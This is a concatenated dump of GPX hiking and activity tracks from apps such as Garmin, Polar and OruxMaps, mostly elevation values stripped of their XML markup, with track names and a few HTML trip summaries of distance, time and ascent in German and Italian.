+449.55 + + + +452.44 + + + +456.28 + + + +458.69 + + + +461.57 + + + +465.9 + + + +486.56 + + + +494.26 + + + +499.06 + + + +500.5 + + + +509.16 + + + +510.12 + + + +515.88 + + + +510.12 + + + +509.16 + + + +503.39 + + + +503.87 + + + +508.67 + + + +508.19 + + + +502.43 + + + +500.98 + + + +521.65 + + + +547.61 + + + +542.8 + + + +537.03 + + + +536.55 + + + +537.51 + + + +541.84 + + + +550.49 + + + +550.49 + +" +" + + +GPSies Track + + + + +GPSies Track on GPSies.com + + +GPSies Track on GPSies.com + + + +1020.0 + + + +1042.0 + + + +1075.0 + + + +1091.0 + + + +1107.0 + + + +1231.0 + + + +1246.0 + + + +1321.0 + + + +1387.0 + + + +1377.0 + + + +1380.0 + + + +1402.0 + + + +1398.0 + + + +1393.0 + + + +1411.0 + + + +1443.0 + + + +1477.0 + + + +1494.0 + + + +1540.0 + + + +1573.0 + + + +1590.0 + + + +1614.0 + + + +1644.0 + + + +1728.0 + + + +1743.0 + + + +1754.0 + + + +1800.0 + + + +1807.0 + + + +1845.0 + + + +1843.0 + + + +1874.0 + + + +1929.0 + + + +1959.0 + + + +2043.0 + + + +2044.0 + +" +" + + + +Polar + + + + + + + + +1320.0 + + + +1320.0 + + + +1348.0 + + + +1331.0 + + + +1331.0 + + + +1335.0 + + + +1338.0 + + + +1339.0 + + + +1347.0 + + + +1354.0 + + + +1359.0 + + + +1365.0 + + + +1383.0 + + + +1419.0 + + + +1486.0 + + + +1516.0 + + + +1544.0 + + + +1556.0 + + + +1584.0 + + + +1599.0 + + + +1626.0 + + + +1645.0 + + + +1654.0 + + + +1687.0 + + + +1725.0 + + + +1750.0 + + + +1761.0 + + + +1831.0 + + + +1851.0 + + + +1875.0 + + + +1915.0 + + + +1927.0 + + + +1967.0 + + + +2011.0 + + + +2061.0 + + + +2082.0 + + + +2119.0 + + + +2134.0 + + + +2161.0 + + + +2178.0 + + + +2187.0 + + + +2218.0 + + + +2249.0 + + + +2272.0 + + + +2293.0 + + + +2313.0 + + + +2331.0 + + + +2338.0 + + + +2353.0 + + + +2371.0 + + + +2409.0 + + + +2398.0 + + + +2395.0 + + + +2408.0 + + + +2418.0 + + + +2429.0 + + + +2410.0 + + + +2403.0 + + + +2463.0 + +" +" + + + + + + +Garmin International + + + +PASSO DI POZZERA(VETTA QUOTA 2206)e + + + + + + +1288.3 + + + +1307.05 + + + +1322.43 + + + +1339.73 + + + +1369.05 + + + +1388.28 + + + +1400.3 + + + +1427.21 + + + +1454.13 + + + +1456.53 + + + +1457.02 + + + +1467.59 + + + +1475.76 + + + +1489.7 + + + +1504.12 + + + +1528.63 + + + +1552.19 + + + +1567.57 + + + +1581.03 + + + +1602.66 + + + +1637.74 + + + +1675.72 + + + +1798.76 + + + +1807.42 + + + +1842.98 + + + +1855.96 + + + +1889.61 + + + +1910.28 + + + +1917.97 + + + +1957.86 + + + +1991.99 + + + +2010.73 + + + +2027.56 + + + +2065.05 + + + +2072.74 + + + +2079.95 + + + +2100.14 + + + +2120.81 + + + +2132.82 + + + +2140.99 + + + +2158.78 + + + +2192.42 + + + +2227.99 + + + +2227.03 + + + +2227.99 + + + +2231.36 + + + +2218.38 + + + +2212.13 + + + +2182.81 + + + +2169.35 + + + +2170.79 + + + +2156.37 + + + +2154.93 + + + +2151.57 + + + +2146.76 + + + +2186.18 + + + +2204.92 + +" +" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + +Tourenplanung am 7. November 2016 + +TemporaryUserGroup + + + + + +Tourenplanung am 7. November 2016 + + + +1204.36459 + + +1214.78278 + + +1230.2255 + + +1237.64696 + + +1240.17802 + + +1275.58264 + + +1297.04646 + + +1313.84676 + + +1329.27552 + + +1350.13497 + + +1364.14695 + + +1387.14739 + + +1394.12419 + + +1416.64367 + + +1423.92242 + + +1443.29222 + + +1456.57622 + + +1463.15341 + + +1463.75358 + + +1465.89958 + + +1465.62732 + + +1471.10228 + + +1494.85086 + + +1517.44553 + + +1535.83912 + + +1542.47326 + + +1539.50739 + + +1556.96686 + + +1564.23667 + + +1583.06819 + + +1591.47857 + + +1610.10828 + + +1610.33172 + + +1626.70001 + + +1641.41581 + + +1719.19128 + + +1712.40624 + + +1709.4172 + + +1740.02139 + + +1748.32913 + + +1757.03634 + + +1775.18182 + + +1785.2161 + + +1803.86796 + + +1830.40062 + + +1846.90585 + + +1868.29841 + + +1871.42091 + + +1885.6176 + + +1943.30125 + + +1968.57261 + + +1971.71536 + + +1961.70555 + + +1975.65621 + + +1991.76978 + + +2000.5434 + + +2002.07228 + + +2007.37516 + + +2022.64264 + + +2033.97951 + + +2047.58328 + + +2062.77895 + + +2074.09415 + + +2093.61566 + + +2099.51138 + + +2105.81257 + + +2119.57224 + + +2132.60845 + + +2118.86563 + + +2162.37126 + + +2209.88382 + + +2209.55001 + + +2264.01609 + + +2315.46692 + + +2358.90867 +" +" + + + +Polar + + + + + + + + +1320.0 + + + +1320.0 + + + +1348.0 + + + +1331.0 + + + +1331.0 + + + +1335.0 + + + +1338.0 + + + +1339.0 + + + +1347.0 + + + +1354.0 + + + +1359.0 + + + +1365.0 + + + +1383.0 + + + +1419.0 + + + +1486.0 + + + +1516.0 + + + +1544.0 + + + +1556.0 + + + +1584.0 + + + +1599.0 + + + +1626.0 + + + +1645.0 + + + +1654.0 + + + +1687.0 + + + +1725.0 + + + +1750.0 + + + +1761.0 + + + +1831.0 + + + +1851.0 + + + +1875.0 + + + +1915.0 + + + +1927.0 + + + +1967.0 + + + +2011.0 + + + +2061.0 + + + +2082.0 + + + +2119.0 + + + +2134.0 + + + +2161.0 + + + +2178.0 + + + +2187.0 + + + +2218.0 + + + +2249.0 + + + +2272.0 + + + +2293.0 + + + +2313.0 + + + +2331.0 + + + +2338.0 + + + +2353.0 + + + +2371.0 + + + +2409.0 + + + +2398.0 + + + +2395.0 + + + +2408.0 + + + +2418.0 + + + +2429.0 + + + +2410.0 + + + +2403.0 + + + +2463.0 + +" +" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + + +Polar + + + + + + + + +926.0 + + + +942.0 + + + +947.0 + + + +976.0 + + + +989.0 + + + +1005.0 + + + +1018.0 + + + +1024.0 + + + +1059.0 + + + +1071.0 + + + +1128.0 + + + +1139.0 + + + +1152.0 + + + +1176.0 + + + +1251.0 + + + +1285.0 + + + +1289.0 + + + +1301.0 + + + +1316.0 + + + +1324.0 + + + +1333.0 + + + +1343.0 + + + +1349.0 + + + +1355.0 + + + +1360.0 + + + +1369.0 + + + +1386.0 + + + +1398.0 + + + +1406.0 + + + +1411.0 + + + +1429.0 + + + +1463.0 + + + +1496.0 + + + +1515.0 + + + +1531.0 + + + +1534.0 + + + +1543.0 + + + +1543.0 + + + +1586.0 + + + +1601.0 + + + +1620.0 + + + +1639.0 + + + +1650.0 + + + +1657.0 + + + +1680.0 + + + +1715.0 + + + +1720.0 + + + +1734.0 + + + +1741.0 + + + +1767.0 + + + +1782.0 + +" +" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + +gardiole + + + + + +OruxMaps + + + +gardiole +<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: gardiole</h2><br /><p>Startzeit: 03/31/2016 14:32</p><p>Zielzeit: 03/31/2016 15:59</p><p>Strecke: 5,9km (01:26)</p><p>Bewegungszeit: 01:17</p><p>Ø-Geschwindigkeit: 4,1km/h</p><p>Netto-Geschwindigkeit: 4,6km/h</p><p>Max. Geschwindigkeit: 7,2km/h</p><p>Minimale Höhe: 110m</p><p>Maximale Höhe: 231m</p><p>Steig-Geschw.: 343,9m/h</p><p>Sink-Geschw.: -357,5m/h</p><p>Aufstieg: 216m</p><p>Abstieg: -240m</p><p>Steigzeit: 00:37</p><p>Sinkzeit: 00:40</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/> + +Unbestimmt + + + + + +178.01 + + + +188.8 + + + +160.19 + + + +161.07 + + + +159.72 + + + +202.68 + + + +213.57 + + + +216.33 + + + +219.69 + + + +221.69 + + + +223.69 + + + +223.56 + + + +225.19 + + + +224.1 + + + +224.57 + + + +230.16 + + + +231.68 + + + +226.83 + + + +220.32 + + + +219.82 + + + +216.7 + + + +214.22 + + + +211.85 + + + +212.66 + + + +193.72 + + + +194.7 + + + +188.45 + + + +185.13 + + + +159.78 + + + +153.63 + + + +133.69 + + + +110.57 + + + +120.4 + + + +142.69 + + + +144.19 + + + +144.19 + + + +147.09 + + + +150.02 + + + +154.19 + + + +163.16 + + + +168.66 + + + +167.25 + + + +190.2 + + + +195.22 + + + +202.78 + + + +209.19 + + + +215.35 + + + +217.19 + + + +216.72 + + + +218.26 + + + +216.09 + + + +220.68 + + + +222.66 + + + +224.67 + + + +224.85 + + + +221.59 + + + +222.2 + + + +220.36 + + + +223.2 + + + +217.67 + + + +217.18 + + + +216.29 + + + +205.6 + + + +186.22 + + + +172.22 + + + +160.82 + + + +156.7 + + + +154.59 + +" +" + + +13_ago_2016_11_21_41_AM.gpx + +Registrato da Geo Tracker per Android di Ilya Bogdanovich + + + + +13 ago 2016 11:21:41 AM + + + +622.0 + + + +675.0 + + + +681.0 + + + +689.0 + + + +704.0 + + + +697.0 + + + +757.0 + + + +743.0 + + + +750.0 + + + +768.0 + + + +763.0 + + + +800.0 + + + +801.0 + + + +823.0 + + + +837.0 + + + +813.0 + + + +813.0 + + + +814.0 + + + +819.0 + + + +812.0 + + + +811.0 + + + +806.0 + + + +789.0 + + + +779.0 + + + +764.0 + + + +758.0 + + + +736.0 + + + +715.0 + + + +712.0 + + + +685.0 + + + +684.0 + + + +658.0 + + + +650.0 + + + +638.0 + + + +#fbaf00 +#1" +" + + + + + + +Garmin Connect + + +7-Eggen-Höhenweg + + + +936.2000122070312 + + + +939.7999877929688 + + + +944.4000244140625 + + + +951.0 + + + +974.2000122070312 + + + +1000.2000122070312 + + + +1011.7999877929688 + + + +1013.2000122070312 + + + +1026.800048828125 + + + +1031.199951171875 + + + +1045.199951171875 + + + +1060.800048828125 + + + +1069.4000244140625 + + + +1068.800048828125 + + + +1061.4000244140625 + + + +1060.5999755859375 + + + +1026.0 + + + +1001.5999755859375 + + + +1008.5999755859375 + + + +1021.5999755859375 + + + +1017.2000122070312 + + + +1002.4000244140625 + + + +978.7999877929688 + + + +976.5999755859375 + + + +979.0 + + + +977.0 + + + +987.4000244140625 + + + +983.5999755859375 + + + +987.7999877929688 + + + +1003.7999877929688 + + + +998.4000244140625 + + + +1000.5999755859375 + + + +996.4000244140625 + + + +999.4000244140625 + + + +991.5999755859375 + + + +1000.2000122070312 + + + +1003.7999877929688 + + + +998.5999755859375 + + + +1000.0 + + + +993.7999877929688 + + + +987.0 + + + +966.5999755859375 + + + +961.0 + + + +957.4000244140625 + + + +962.5999755859375 + + + +958.4000244140625 + + + +968.4000244140625 + + + +990.5999755859375 + + + +991.0 + + + +936.2000122070312 + + + +902.7999877929688 + + + +899.2000122070312 + + + +877.5999755859375 + + + +864.5999755859375 + + + +846.5999755859375 + + + +832.5999755859375 + + + +817.2000122070312 + + + +781.0 + + + +772.2000122070312 + + + +765.2000122070312 + + + +758.0 + +" +" + + + + + + +Garmin International + + + +2017-07-30 14:37:08 001 + + + + + + +1453.49 + + + +1436.32 + + + +1436.57 + + + +1417.0 + + + +1407.69 + + + +1403.0 + + + +1375.91 + + + +1331.71 + + + +1328.72 + + + +1303.85 + + + +1287.66 + + + +1277.08 + + + +1268.62 + + + +1252.37 + + + +1240.64 + + + +1231.92 + + + +1209.08 + + + +1227.9 + + + +1218.12 + + + +1207.35 + + + +1199.09 + + + +1157.09 + + + +1150.13 + + + +1142.82 + + + +1139.39 + + + +1139.28 + + + +1134.67 + + + +1130.37 + + + +1135.31 + + + +1106.13 + + + +1097.97 + + + +1046.27 + + + +1024.6 + + + +1019.57 + + + +1004.39 + + + +989.29 + + + +963.46 + + + +949.01 + + + +946.77 + + + +925.67 + + + +918.56 + + + +904.49 + + + +892.43 + + + +892.18 + + + +891.83 + + + +891.51 + + + +890.24 + + + +889.91 + + + +887.68 + + + +885.79 + + + +866.54 + + + +851.49 + + + +846.3 + + + +822.38 + + + +817.96 + + + +810.65 + + + +806.53 + + + +801.85 + + + +790.71 + + + +785.01 + + + +780.84 + + + +777.16 + + + +773.03 + + + +766.71 + + + +760.9 + + + +759.76 + + + +757.94 + + + +754.05 + + + +739.54 + +" +" + + + + + + +Garmin International + + + +Corona dei Pinci + + + + + + +918.3671875 + + +932.09375 + + +923.30078125 + + +926.05859375 + + +953.4765625 + + +952.9453125 + + +967.05078125 + + +983.84375 + + +1003.25 + + +1032.82421875 + + +1045.6171875 + + +1045.66015625 + + +1048.94140625 + + +1067.15234375 + + +1076.29296875 + + +1087.2734375 + + +1124.4140625 + + +1193.30078125 + + +1215.24609375 + + +1239.13671875 + + +1263.73046875 + + +1261.6640625 + + +1244.2734375 + + +1229.52734375 + + +1232.12109375 + + +1221.8203125 + + +1213.68359375 + + +1195.0703125 + + +1185.0625 + + +1184.984375 + + +1164.30859375 + + +1167.015625 + + +1134.390625 + + +1136.765625 + + +1124.34765625 + + +1100.16796875 + + +1081.8515625 + + +1071.125 + + +1058.33984375 + + +1049.82421875 + + +1033.484375 + + +1016.9140625 + + +1000.52734375 + + +989.67578125 + + +987.16015625 + + +952.375 + + +935.72265625 + + +921.20703125 + + +909.046875 + + +911.375 +" +" + + + + + + + +2016-05-05 16:41:22 + + + +357.75 + + +357.27 + + +360.63 + + +364.48 + + +401.97 + + +416.39 + + +431.29 + + +454.36 + + +461.57 + + +479.35 + + +593.75 + + +786.02 + + +786.98 + + +799.47 + + +803.8 + + +800.92 + + +802.36 + + +786.02 + + +797.55 + + +824.47 + + +840.33 + + +859.08 + + +857.15 + + +850.42 + + +845.14 + + +842.73 + + +855.71 + + +858.59 + + +861.0 + + +851.87 + + +853.31 + + +855.23 + + +852.83 + + +847.54 + + +848.98 + + +844.66 + + +852.35 + + +851.38 + + +849.94 + + +850.9 + + +846.1 + + +844.18 + + +842.73 + + +840.81 + + +833.6 + + +823.51 + + +819.18 + + +804.28 + + +800.44 + + +801.4 + + +799.47 + + +798.03 + + +786.02 + + +781.69 + + +776.88 + + +772.56 + + +748.52 + + +744.2 + + +738.43 + + +731.22 + + +725.93 + + +716.8 + + +661.52 + + +654.31 + + +642.78 + + +629.8 + + +606.73 + + +602.88 + + +613.46 + + +612.98 + + +614.9 + + +618.26 + + +617.78 + + +616.34 + + +612.5 + + +605.77 + + +605.29 + + +582.22 + + +569.72 + + +559.62 + + +548.57 + + +530.3 + + +504.35 + + +477.43 + + +466.38 + + +459.65 + + +457.24 + + +454.84 + + +448.11 + + +445.23 + + +443.79 + + +442.34 + + +439.94 + + +433.21 + + +432.73 + + +433.21 +" +" + + + + + +2016 +http://www.runtastic.com + +runtastic + + + +Visit this link to view this activity on runtastic.com + + +539.0 + + + +541.0 + + + +542.0 + + + +546.0 + + + +550.0 + + + +567.0 + + + +576.0 + + + +573.0 + + + +586.0 + + + +576.0 + + + +581.0 + + + +574.0 + + + +592.0 + + + +588.0 + + + +592.0 + + + +595.0 + + + +589.0 + + + +587.0 + + + +587.0 + + + +587.0 + + + +583.0 + + + +583.0 + + + +598.0 + + + +613.0 + + + +613.0 + + + +619.0 + + + +626.0 + + + +616.0 + + + +636.0 + + + +625.0 + + + +627.0 + + + +643.0 + + + +638.0 + + + +657.0 + + + +663.0 + + + +638.0 + + + +645.0 + + + +657.0 + + + +660.0 + + + +652.0 + + + +651.0 + + + +648.0 + + + +645.0 + + + +622.0 + + + +630.0 + + + +631.0 + + + +635.0 + + + +612.0 + + + +593.0 + + + +581.0 + + + +584.0 + + + +582.0 + + + +574.0 + + + +570.0 + + + +575.0 + + + +569.0 + + + +566.0 + + + +561.0 + + + +552.0 + + + +558.0 + + + +566.0 + + + +566.0 + + + +565.0 + + + +568.0 + + + +558.0 + + + +557.0 + + + +532.0 + +" +" + + + + + + + + + +Mutspitze Teil 3 + + + +718.0 + + + + + +0.000000 + +717.0 + + + + + +3.112118 + +698.0 + + + + + +12.122971 + +687.0 + + + + + +12.135834 + +676.0 + + + + + +3.671173 + +662.0 + + + + + +3.697571 + +648.0 + + + + + +11.624756 + +637.0 + + + + + +2.026062 + +635.0 + + + + + +17.006958 + +635.0 + + + + + +2.593079 + +637.0 + + + + + +17.039490 + +637.0 + + + + + +7.784790 + +633.0 + + + + + +11.284851 + +624.0 + + + + + +0.989563 + +613.0 + + + + + +13.613892 + +595.0 + + + + + +1.245117 + +586.0 + + + + + +11.436890 + +562.0 + + + + + +3.340332 + +545.0 + + + + + +13.034668" +" + + + + + + + +Minschuns1 + + +Minschuns1_0 + + +Minschuns1_1 + + +Minschuns1_2 + + +Minschuns1_3 + + +Minschuns1_4 + + +Minschuns1_5 + + +Minschuns1_6 + + +Minschuns1_7 + + +Minschuns1_8 + + +Minschuns1_9 + + +Minschuns1_10 + + +Minschuns1_11 + + +Minschuns1_12 + + +Minschuns1_13 + + +Minschuns1_14 + + +Minschuns1_15 + + +Minschuns1_16 + + +Minschuns1_17 + + +Minschuns1_18 + + +Minschuns1_19 + + +Minschuns1_20 + + +Minschuns1_21 + + +Minschuns1_22 + + +Minschuns1_23 + + +Minschuns1_24 + + +Minschuns1_25 + + +Minschuns1_26 + + +Minschuns1_27 + + +Minschuns1_28 + + +Minschuns1_29 + + +Minschuns1_30 + + +Minschuns1_31 + + +Minschuns1_32 + + +Minschuns1_33 + + +Minschuns1_34 + + +Minschuns1_35 + + +Minschuns1_36 + + +Minschuns1_37 + + +Minschuns1_38 + + +Minschuns1_39 + + +Minschuns1_40 + + +Minschuns1_41 + + +Minschuns1_42 + + +Minschuns1_43 + + +Minschuns1_44 + + +Minschuns1_45 + + +Minschuns1_46 + + +Minschuns1_47 + + +Minschuns1_48 + + +Minschuns1_49 + + +Minschuns1_50 + + +Minschuns1_51 + + +Minschuns1_52 + + +Minschuns1_53 + + +Minschuns1_54 + + +Minschuns1_55 + + +Minschuns1_56 + + +Minschuns1_57 + + +Minschuns1_58 + + +Minschuns1_59 + + +Minschuns1_60 + + +Minschuns1_61 + + +Minschuns1_62 + + +Minschuns1_63 + + +Minschuns1_64 + + +Minschuns1_65 + + +Minschuns1_66 + + +Minschuns1_67 + + +Minschuns1_68 +" +" + + + + + + +Garmin Connect + + +Zustieg Guferstock + +hiking + + +2129.199951171875 + + + + + + +2132.39990234375 + + + + + + +2138.0 + + + + + + +2144.39990234375 + + + + + + +2154.39990234375 + + + + + + +2180.60009765625 + + + + + + +2188.0 + + + + + + +2204.39990234375 + + + + + + +2213.199951171875 + + + + + + +2217.39990234375 + + + + + + +2227.39990234375 + + + + + + +2236.0 + + + + + + +2241.60009765625 + + + + + + +2243.60009765625 + + + + + + +2253.39990234375 + + + + + + +2268.60009765625 + + + + + + +2281.39990234375 + + + + + + +2302.60009765625 + + + + + + +2323.39990234375 + + + + + + +2348.60009765625 + + + + + + +2344.39990234375 + + + + + + +2344.39990234375 + + + + + + +2347.60009765625 + + + + + " +" + + + + + + +Garmin Connect + + +Punta Giordani & Corno del Camoscio 21. / 22.08.2015 - I - + + + +2971.39990234375 + + + +2977.199951171875 + + + +2942.60009765625 + + + +2937.60009765625 + + + +2936.60009765625 + + + +2945.0 + + + +2947.800048828125 + + + +2983.199951171875 + + + +2998.199951171875 + + + +2968.39990234375 + + + +3001.800048828125 + + + +3002.199951171875 + +" +" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + + + + + + + + + +656.400024414062 + + + +659.200012207031 + + + +659.200012207031 + + + +663.400024414062 + + + +667.599975585938 + + + +669.599975585938 + + + +671.599975585938 + + + +676.599975585938 + + + +678.200012207031 + + + +678.200012207031 + + + +681.200012207031 + + + +683.400024414062 + + + +687.400024414062 + + + +689.799987792969 + + + +694.200012207031 + + + +700.400024414062 + + + +705.599975585938 + + + +710.599975585938 + + + +712.599975585938 + + + +713.799987792969 + + + +717.200012207031 + + + +725.400024414062 + + + +731.200012207031 + + + +731.599975585938 + + + +733.400024414062 + + + +733.400024414062 + + + +739.599975585938 + + + +743.799987792969 + + + +746.0 + + + +749.0 + + + +752.200012207031 + + + +756.599975585938 + + + +761.0 + + + +777.200012207031 + + + +787.799987792969 + + + +810.400024414062 + +" +" + + +2018.01.28 Carì + + + + + + + + + +1630.3000033694498 + + +1636.400065099151 + + +1643.6 + + +1643.5999982063524 + + +1644.200010627977 + + +1647.5569015864396 + + +1656.6999643087859 + + +1670.5 + + +1678.9000265642576 + + +1690.1 + + +1715.699980212622 + + +1723.8999758634952 + + +1739.1999745929438 + + +1742.400009588401 + + +1746.2 + + +1760.1666887286542 + + +1776.9 + + +1788.80001863191 + + +1795.5999994841382 + + +1815.8999365356303 + + +1846.4 + + +1863.4999379205913 + + +1870.2409298915097 + + +1897.5999151283813 + + +1919.8998357630308 + + +1928.6000059873218 + + +1938.10000881802 + + +1942.2023445552654 + + +1944.3200623809794 + + +1948.200026260243 + + +1949.8479789904309 + + +1951.0 + + +1955.8999830556004 + + +1953.7000223718712 + + +1949.5999905117833 + + +1942.0 + + +1942.2999964721218 + + +1941.6395061870714 + + +1934.100005898918 + + +1925.4999826045164 + + +1920.6128791935278 + + +1910.300143781563 + + +1848.3999634985632 + + +1845.2336299230526 + + +1841.0698169614623 + + +1838.2999892549528 + + +1829.4999768591579 + + +1822.2000084208476 + + +1815.0000101565377 + + +1817.699982263608 + + +1812.1000234215842 + + +1780.9000208054986 + + +1764.3000755896064 + + +1751.9999587802401 + + +1723.3999853507353 + + +1714.899949945837 + + +1684.2999672217504 + + +1675.5000168586444 + + +1664.3999607080104 + + +1652.6999481552225 + + +1644.3830965221337 + + +1640.6999975227957 + + +1639.3480581372235 + + +1623.4999896476527 + + +1628.300012055273 + + +1632.2999821296967 + + +1636.2000090486802 + + +1639.2999820604614 + + +1643.3000279503103 + + +1647.699996646298 + + +1647.5999990278497 + + +1647.8999928037529 + + +1648.7768243939054 + + +1646.6000024835569 + + +1643.3999991378407 + + +1638.500019978469 + + +1633.200007121892 + + +1630.3000033694498 +" +" + + + + + + +Garmin International + + +2015-08-04 12:18:19 Illhorn + + + + + + +2474.46 + + + +2486.41 + + + +2496.57 + + + +2525.33 + + + +2531.1 + + + +2542.12 + + + +2549.38 + + + +2557.59 + + + +2578.14 + + + +2602.71 + + + +2612.18 + + + +2653.99 + + + +2663.46 + + + +2693.54 + + + +2702.9 + + + +2704.95 + + + +2701.13 + + + +2696.65 + + + +2679.13 + + + +2668.44 + + + +2664.11 + + + +2658.83 + + + +2642.47 + + + +2635.81 + + + +2627.67 + + + +2620.24 + + + +2603.14 + + + +2575.84 + + + +2554.23 + + + +2546.94 + + + +2539.8 + + + +2529.9 + + + +2523.26 + + + +2514.33 + + + +2505.71 + + + +2495.95 + + + +2477.25 + + + +2469.08 + + + +2466.57 + +" +" + + +2014-07-01 09:02 + + + + + +OruxMaps + + + +2014-07-01 09:02 +<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Nome: 2014-07-01 09:02</h2><br /><p>Orario inizio: 07/01/2014 09:01</p><p>Orario fine: 07/01/2014 11:53</p><p>Distanza: 3,9 km (02:51)</p><p>Tempo movimento: 01:25</p><p>Media segmento attuale: 1,4 km/h</p><p>Media veloc. mov.: 2,8 km/h</p><p>Max. Velocità: 12,9 km/h</p><p>Altitudine minima: 1023 m</p><p>Altitudine massima: 1111 m</p><p>Velocità di salita: 67,5 m/h</p><p>Velocità di discesa: -112,2 m/h</p><p>Guadagno di elevazione: 102 m</p><p>Perdita di elevazione: -101 m</p><p>Tempo di salita: 01:31</p><p>Tempo di discesa: 00:54</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/> + +Non definito + + + + + +1037.17 + + + +1035.31 + + + +1035.22 + + + +1036.91 + + + +1038.49 + + + +1040.05 + + + +1044.76 + + + +1043.76 + + + +1047.56 + + + +1046.71 + + + +1047.91 + + + +1052.61 + + + +1057.62 + + + +1061.82 + + + +1064.19 + + + +1076.85 + + + +1083.51 + + + +1085.6 + + + +1095.01 + + + +1099.89 + + + +1102.37 + + + +1109.63 + + + +1109.78 + + + +1106.62 + + + +1098.0 + + + +1095.02 + + + +1101.83 + + + +1098.28 + + + +1096.32 + + + +1091.18 + + + +1088.12 + + + +1085.38 + + + +1075.52 + + + +1092.6 + + + +1094.75 + + + +1095.73 + + + +1090.1 + + + +1104.86 + + + +1101.74 + + + +1078.23 + + + +1078.36 + + + +1078.92 + + + +1087.84 + + + +1081.2 + + + +1073.02 + + + +1070.63 + + + +1071.89 + + + +1059.75 + + + +1054.27 + + + +1059.3 + + + +1058.88 + + + +1059.33 + + + +1057.93 + + + +1050.73 + + + +1041.56 + + + +1023.14 + + + +1043.65 + + + +1042.52 + + + +1041.01 + + + +1039.7 + + + +1036.22 + +" +" + + + + + + + + + + +704.599975585938 + + + +704.799987792969 + + + +704.799987792969 + + + +711.799987792969 + + + +721.400024414062 + + + +733.599975585938 + + + +737.200012207031 + + + +744.799987792969 + + + +749.400024414062 + + + +758.799987792969 + + + +765.599975585938 + + + +774.799987792969 + + + +787.799987792969 + + + +809.0 + + + +821.599975585938 + + + +829.799987792969 + + + +846.0 + + + +869.200012207031 + + + +875.0 + + + +880.400024414062 + + + +885.799987792969 + + + +897.0 + + + +914.599975585938 + + + +925.400024414062 + + + +929.599975585938 + + + +930.400024414062 + + + +929.400024414062 + + + +914.0 + + + +895.799987792969 + + + +887.400024414062 + + + +883.0 + + + +879.0 + + + +924.599975585938 + + + +931.400024414062 + + + +940.200012207031 + + + +958.0 + + + +987.400024414062 + + + +991.799987792969 + + + +1011.20001220703 + + + +1026.19995117188 + + + +1046.59997558594 + + + +1066.19995117188 + + + +1072.40002441406 + + + +1098.59997558594 + + + +1114.80004882812 + + + +1126.40002441406 + + + +1131.80004882812 + + + +1132.19995117188 + + + +1143.19995117188 + + + +1151.40002441406 + + + +1172.0 + + + +1193.19995117188 + + + +1203.0 + + + +1225.59997558594 + + + +1253.19995117188 + + + +1288.40002441406 + + + +1308.80004882812 + + + +1330.80004882812 + + + +1351.40002441406 + + + +1358.40002441406 + + + +1368.80004882812 + + + +1379.40002441406 + + + +1383.19995117188 + + + +1385.19995117188 + + + +1391.80004882812 + + + +1402.59997558594 + + + +1428.0 + + + +1460.0 + + + +1479.19995117188 + +" +" + + +Peynard + + + + + +OruxMaps + + + +Peynard +<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: Peynard</h2><br /><p>Startzeit: 06/15/2017 09:03</p><p>Zielzeit: 06/15/2017 10:51</p><p>Strecke: 3,9km (01:47)</p><p>Bewegungszeit: 01:26</p><p>Ø-Geschwindigkeit: 2,2km/h</p><p>Netto-Geschwindigkeit: 2,7km/h</p><p>Max. Geschwindigkeit: 7,7km/h</p><p>Minimale Höhe: 2100m</p><p>Maximale Höhe: 2782m</p><p>Steig-Geschw.: 486,9m/h</p><p>Sink-Geschw.: -498,1m/h</p><p>Aufstieg: 713m</p><p>Abstieg: -75m</p><p>Steigzeit: 01:27</p><p>Sinkzeit: 00:09</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/> + +Unbestimmt + + + + + +2114.88 + + + +2107.34 + + + +2105.42 + + + +2103.42 + + + +2113.3 + + + +2121.29 + + + +2124.52 + + + +2136.36 + + + +2142.39 + + + +2140.43 + + + +2145.29 + + + +2155.43 + + + +2154.85 + + + +2166.31 + + + +2160.99 + + + +2158.92 + + + +2161.27 + + + +2161.17 + + + +2171.8 + + + +2187.11 + + + +2203.34 + + + +2218.92 + + + +2225.91 + + + +2239.76 + + + +2243.35 + + + +2273.16 + + + +2281.8 + + + +2309.89 + + + +2322.42 + + + +2340.85 + + + +2342.55 + + + +2378.27 + + + +2407.05 + + + +2425.92 + + + +2495.95 + + + +2519.45 + + + +2590.68 + + + +2636.91 + + + +2694.42 + + + +2694.48 + + + +2714.93 + + + +2745.92 + + + +2772.42 + + + +2782.85 + +" +" + + +Mont Charvin 2 + + + + + +OruxMaps + + + +Mont Charvin 2 +<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: Mont Charvin 2</h2><br /><p>Startzeit: 06/23/2016 10:58</p><p>Zielzeit: 06/23/2016 14:05</p><p>Strecke: 4,2km (03:06)</p><p>Bewegungszeit: 01:43</p><p>Ø-Geschwindigkeit: 1,3km/h</p><p>Netto-Geschwindigkeit: 2,4km/h</p><p>Max. Geschwindigkeit: 5,7km/h</p><p>Minimale Höhe: 1382m</p><p>Maximale Höhe: 2404m</p><p>Steig-Geschw.: 364,2m/h</p><p>Sink-Geschw.: -177,6m/h</p><p>Aufstieg: 1039m</p><p>Abstieg: -33m</p><p>Steigzeit: 02:51</p><p>Sinkzeit: 00:11</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/> + +Unbestimmt + + + + + +1383.54 + + + +1401.87 + + + +1406.5 + + + +1405.53 + + + +1425.53 + + + +1441.36 + + + +1456.66 + + 